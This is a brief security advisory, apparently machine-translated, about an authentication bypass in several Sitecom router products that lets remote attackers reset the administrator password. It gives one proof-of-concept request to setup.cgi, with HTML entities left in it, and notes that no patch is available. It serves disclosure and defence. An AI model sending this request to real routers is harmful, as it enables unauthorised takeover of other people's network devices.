Release date: 2012-09-06
Updated on: 2012-09-08
Affected Systems:
Sitecom
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55429
Sitecom is a provider of Computer Network Solutions for families and small businesses.
Multiple Sitecom products have the Authentication Bypass Vulnerability, which allows remote attackers to bypass security restrictions and change the administrator password.
<* Source: Mattijs van Ommeren
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/cgi-bin/setup.cgi? ChgSystemStatus & amp; hackedSitecom & amp; workgroup & amp; & lt; password & gt;
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sitecom
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.sitecom.com/wireless-modem-router-300n/p/859